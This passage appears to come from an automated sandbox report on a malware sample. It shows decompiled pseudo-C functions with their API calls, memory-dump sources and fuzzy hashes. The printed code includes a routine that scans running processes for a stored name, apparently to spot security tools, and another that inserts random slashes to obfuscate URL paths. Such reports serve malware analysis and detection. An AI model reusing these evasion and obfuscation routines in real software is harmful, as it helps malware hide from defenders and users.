                                                          • GetLastError.KERNEL32 ref: 046392F2
                                                            • Part of subcall function 04635646: WaitForMultipleObjects.KERNEL32(00000002,0463A8E3,00000000,0463A8E3,?,?,?,0463A8E3,0000EA60), ref: 04635661
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04639327
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: f9cfc0b01253cf8ed240c10d1b73f85d07997348e1d24e41fc4fd88658262550
                                                          • Instruction ID: 43b81035d6feedb76e2b56e6a042ab1de0be2cb9a41cba7541f786d71e11f9e6
                                                          • Opcode Fuzzy Hash: f9cfc0b01253cf8ed240c10d1b73f85d07997348e1d24e41fc4fd88658262550
                                                          • Instruction Fuzzy Hash: 39312FF5900388EFEB20DFE5CCC499EB7B8EB18305F10496AE542E2250E775EA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046336B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E046336B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04633BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04634F79(_t23);
						}
					}
					return _t38;
				}
				if(E0463A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x463d2ac, 1, 0,  *0x463d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0463A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0463853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04634F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E046311EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x046336b1
                                                          0x046336be
                                                          0x046336c4
                                                          0x046336c5
                                                          0x046336c6
                                                          0x046336c7
                                                          0x046336c8
                                                          0x046336cc
                                                          0x046336d8
                                                          0x046336dc
                                                          0x04633764
                                                          0x04633764
                                                          0x04633767
                                                          0x04633769
                                                          0x04633771
                                                          0x04633771
                                                          0x04633777
                                                          0x0463377a
                                                          0x0463377a
                                                          0x04633777
                                                          0x04633785
                                                          0x04633785
                                                          0x046336ef
                                                          0x046336f1
                                                          0x046336f1
                                                          0x04633708
                                                          0x0463370c
                                                          0x0463370f
                                                          0x0463371a
                                                          0x04633721
                                                          0x04633721
                                                          0x0463372a
                                                          0x0463372e
                                                          0x0463373c
                                                          0x04633730
                                                          0x04633730
                                                          0x04633731
                                                          0x04633732
                                                          0x04633733
                                                          0x04633734
                                                          0x04633735
                                                          0x04633735
                                                          0x04633741
                                                          0x04633744
                                                          0x04633748
                                                          0x0463374a
                                                          0x0463374a
                                                          0x04633751
                                                          0x00000000
                                                          0x04633753
                                                          0x04633753
                                                          0x04633760
                                                          0x00000000
                                                          0x04633760

                                                          APIs
                                                          • CreateEventA.KERNEL32(0463D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,046352AA,?,00000001,?), ref: 04633702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 0463370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 0463371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,046352AA,?,00000001,?,00000002,?,?,04635D5E,?), ref: 04633721
                                                            • Part of subcall function 0463A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04633741,?,04633741,?,?,?,?,?,04633741,?), ref: 0463A520
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 92d4023ce107ebdf6f9ac91fae78b80e1a3c7fdaeb40cb187a3eae9cf5455d26
                                                          • Instruction ID: c2462a4ceb341291d6edca98e5c126b7736dc0eb7610d697f17fa7c02b1e1fe6
                                                          • Opcode Fuzzy Hash: 92d4023ce107ebdf6f9ac91fae78b80e1a3c7fdaeb40cb187a3eae9cf5455d26
                                                          • Instruction Fuzzy Hash: A92198B39002D5ABDB10BFE488C48EEB7B9DB54356B054429FE11E7300F735B9858BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E04636545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E0463A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x04636551
                                                          0x04636555
                                                          0x04636556
                                                          0x04636557
                                                          0x04636559
                                                          0x0463655b
                                                          0x0463655e
                                                          0x04636563
                                                          0x046365fa
                                                          0x04636601
                                                          0x04636601
                                                          0x0463656c
                                                          0x04636573
                                                          0x04636583
                                                          0x04636583
                                                          0x04636589
                                                          0x0463658b
                                                          0x04636590
                                                          0x04636599
                                                          0x0463659f
                                                          0x046365a4
                                                          0x046365af
                                                          0x046365b3
                                                          0x046365b5
                                                          0x046365b6
                                                          0x046365bf
                                                          0x046365c3
                                                          0x046365d4
                                                          0x046365c5
                                                          0x046365ca
                                                          0x046365cf
                                                          0x046365de
                                                          0x046365de
                                                          0x046365b3
                                                          0x046365e4
                                                          0x046365ea
                                                          0x046365ea
                                                          0x046365f3
                                                          0x046365f8
                                                          0x046365f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 717015bc3a35b1aa29fe133cdd5d4f65637c5fdb136e5b8fe84053b5ed0b5ea6
                                                          • Instruction ID: 52cdea993cec21bb35bb658ff2553b607c8139ff40dcb8039796c09b1ed190b1
                                                          • Opcode Fuzzy Hash: 717015bc3a35b1aa29fe133cdd5d4f65637c5fdb136e5b8fe84053b5ed0b5ea6
                                                          • Instruction Fuzzy Hash: 31213C75901249FFDB21DFA8C98499EBBB8EF58316B104179E902A7214FB71EE01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046317E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E046317E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x463d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x463d250; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x463d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x046317ed
                                                          0x046317f0
                                                          0x046317f6
                                                          0x0463180e
                                                          0x04631810
                                                          0x04631815
                                                          0x04631817
                                                          0x0463181a
                                                          0x0463181c
                                                          0x0463181f
                                                          0x04631821
                                                          0x04631821
                                                          0x04631823
                                                          0x0463182e
                                                          0x04631833
                                                          0x04631844
                                                          0x0463184c
                                                          0x04631851
                                                          0x04631854
                                                          0x04631857
                                                          0x04631859
                                                          0x0463185c
                                                          0x0463185f
                                                          0x0463185f
                                                          0x04631862
                                                          0x0463186d
                                                          0x04631872
                                                          0x0463187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04631C49,00000000,?,?,046320C2,?,04EC95B0), ref: 046317F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04631808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04631C49,00000000,?,?,046320C2,?,04EC95B0), ref: 0463184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0463186D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 815118b1599dcf0a12c8a89eb32d141d3fcc908c994ccd3a47345adb5826a97b
                                                          • Instruction ID: ac02769aaaecc6fd7e0ccf3ca83dd81efe5cb10838c04f10cd539f22cd9dacea
                                                          • Opcode Fuzzy Hash: 815118b1599dcf0a12c8a89eb32d141d3fcc908c994ccd3a47345adb5826a97b
                                                          • Instruction Fuzzy Hash: AB11C672A00194BFD710CF69DC84E9EBBAADF95262F050176F5049B250F7749E0487A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0463486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E0463A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x463c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x463c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x0463487a
                                                          0x0463487e
                                                          0x04634880
                                                          0x04634881
                                                          0x04634889
                                                          0x04634889
                                                          0x0463488d
                                                          0x00000000
                                                          0x00000000
                                                          0x04634884
                                                          0x04634885
                                                          0x04634888
                                                          0x04634888
                                                          0x04634895
                                                          0x0463489a
                                                          0x046348a0
                                                          0x046348a8
                                                          0x046348ae
                                                          0x046348b0
                                                          0x046348b5
                                                          0x046348b9
                                                          0x046348bb
                                                          0x046348be
                                                          0x046348c5
                                                          0x046348c5
                                                          0x046348cf
                                                          0x046348d2
                                                          0x046348d3
                                                          0x046348d5
                                                          0x046348e1
                                                          0x046348e1
                                                          0x046348ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04EC95AC,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 04634889
                                                          • StrTrimA.SHLWAPI(?,0463C284,00000002,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348B3
                                                          • StrTrimA.SHLWAPI(00000001,0463C284,?,04635D25,?,0463243F,04EC95AC,?,04635D25), ref: 046348C5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: bc3dc1504e08e21ac3ca7bd62988532468057250685785fab40b892a8e24d1dc
                                                          • Instruction ID: 0c07364afc4830facfd53ff44a71636f169af76a302395099a0c63b32b44da52
                                                          • Opcode Fuzzy Hash: bc3dc1504e08e21ac3ca7bd62988532468057250685785fab40b892a8e24d1dc
                                                          • Instruction Fuzzy Hash: 4801B5726053D19BD3219F699C48E27FB98EB55A96F111518F941D7340FF70EC0296A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E0463A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x463d2a8; // 0x88a5a8
						_t2 = _t9 + 0x463ee34; // 0x73617661
						_push( &_v264);
						if( *0x463d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x0463a667
                                                          0x0463a671
                                                          0x0463a675
                                                          0x0463a67f
                                                          0x0463a6b0
                                                          0x0463a686
                                                          0x0463a68b
                                                          0x0463a698
                                                          0x0463a6a1
                                                          0x0463a6b8
                                                          0x0463a6a3
                                                          0x0463a6ab
                                                          0x00000000
                                                          0x0463a6ab
                                                          0x0463a6b9
                                                          0x0463a6ba
                                                          0x00000000
                                                          0x0463a6ba
                                                          0x00000000
                                                          0x0463a6b4
                                                          0x0463a6c0
                                                          0x0463a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0463A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0463A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0463A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0463A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: f87be5c3df30c023ad308eb69fbb38018cc68beddad561821823499972e26152
                                                          • Instruction ID: 012e860bd83220e01d77f95e3b3ca8e77024d4320cdd311b0a8ea553283d922f
                                                          • Opcode Fuzzy Hash: f87be5c3df30c023ad308eb69fbb38018cc68beddad561821823499972e26152
                                                          • Instruction Fuzzy Hash: 5BF0F0327011A46AEB20AAA29C48DEB76ACDB86213F000261F945C2200FA34EE4686B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04636840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x0463684a
                                                          0x0463684e
                                                          0x04636863
                                                          0x04636865
                                                          0x0463686a
                                                          0x04636870
                                                          0x04636872
                                                          0x04636877
                                                          0x04636882
                                                          0x04636879
                                                          0x04636879
                                                          0x04636879
                                                          0x04636877
                                                          0x04636890

                                                          APIs
                                                          • memset.NTDLL ref: 0463684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04636863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04636870
                                                          • CloseHandle.KERNEL32(?), ref: 04636882
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 5b99046eb16d853e76155978749fdf92210ab05e767bc672fdf4df7359b29313
                                                          • Instruction ID: 8cb208e506f1f8585895b8c7f893dda5c39f3bfd9fd3cc1a909d9a3f7369aa52
                                                          • Opcode Fuzzy Hash: 5b99046eb16d853e76155978749fdf92210ab05e767bc672fdf4df7359b29313
                                                          • Instruction Fuzzy Hash: DBF089F210434C7FD3206F26DCC4C27BBACEB6519EB114E2DF14292111E676BC094A70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04631B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04631B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x463d26c; // 0x324
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x463d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x463d26c; // 0x324
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x463d238; // 0x4ad0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x04631b42
                                                          0x04631b49
                                                          0x04631b93
                                                          0x04631b95
                                                          0x04631b95
                                                          0x04631b4d
                                                          0x04631b53
                                                          0x04631b58
                                                          0x04631b5c
                                                          0x04631b62
                                                          0x04631b69
                                                          0x00000000
                                                          0x00000000
                                                          0x04631b6b
                                                          0x04631b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04631b70
                                                          0x04631b72
                                                          0x04631b7a
                                                          0x04631b7d
                                                          0x04631b7d
                                                          0x04631b83
                                                          0x04631b8a
                                                          0x04631b8d
                                                          0x04631b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(00000324,00000001,04634F0E), ref: 04631B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04631B5C
                                                          • CloseHandle.KERNEL32(00000324), ref: 04631B7D
                                                          • HeapDestroy.KERNEL32(04AD0000), ref: 04631B8D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 980c6cf383e99f20c16dd44f1e6f90f71143871b05655d6637a5125f1164c446
                                                          • Instruction ID: 6956bf83e9448e55e0ec7aae9d98f7b4ce9f2533b47e8545bce7ff3480f46818
                                                          • Opcode Fuzzy Hash: 980c6cf383e99f20c16dd44f1e6f90f71143871b05655d6637a5125f1164c446
                                                          • Instruction Fuzzy Hash: A6F03072A013D197EB109B35E848E963B98EB25763B081250B906E7380FB79EC409660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046323F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E046323F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x463d32c; // 0x4ec95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x463d32c; // 0x4ec95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x463d030) {
					HeapFree( *0x463d238, 0, _t8);
				}
				_t14[1] = E0463486F(_v0, _t14);
				_t11 =  *0x463d32c; // 0x4ec95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x046323f4
                                                          0x046323f4
                                                          0x046323fd
                                                          0x0463240d
                                                          0x0463240d
                                                          0x04632412
                                                          0x04632417
                                                          0x00000000
                                                          0x00000000
                                                          0x04632407
                                                          0x04632407
                                                          0x04632419
                                                          0x0463241d
                                                          0x0463242f
                                                          0x0463242f
                                                          0x0463243f
                                                          0x04632442
                                                          0x04632447
                                                          0x0463244b
                                                          0x04632451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 046323FD
                                                          • Sleep.KERNEL32(0000000A,?,04635D25), ref: 04632407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04635D25), ref: 0463242F
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 0463244B
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: d3f12c047df9db8bd082819b42e0d803ec9ee6935007a037eb3a28902d80deef
                                                          • Instruction ID: 4974db7e8449ae0cc2aca351bbe802f47a26118971b117e919645488f72fafb9
                                                          • Opcode Fuzzy Hash: d3f12c047df9db8bd082819b42e0d803ec9ee6935007a037eb3a28902d80deef
                                                          • Instruction Fuzzy Hash: BCF0D4726002C09BE7109F68ED58F16B7E4EB29747F049444F641E7251F739EC51CA25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04636702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E04636702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x463d32c; // 0x4ec95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x463d32c; // 0x4ec95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x463d32c; // 0x4ec95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x463e81a) {
					HeapFree( *0x463d238, 0, _t10);
					_t7 =  *0x463d32c; // 0x4ec95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x04636702
                                                          0x0463670b
                                                          0x0463671b
                                                          0x0463671b
                                                          0x04636720
                                                          0x04636725
                                                          0x00000000
                                                          0x00000000
                                                          0x04636715
                                                          0x04636715
                                                          0x04636727
                                                          0x0463672c
                                                          0x04636730
                                                          0x04636743
                                                          0x04636749
                                                          0x04636749
                                                          0x04636752
                                                          0x04636754
                                                          0x04636758
                                                          0x0463675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 0463670B
                                                          • Sleep.KERNEL32(0000000A,?,04635D25), ref: 04636715
                                                          • HeapFree.KERNEL32(00000000,?,?,04635D25), ref: 04636743
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 04636758
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
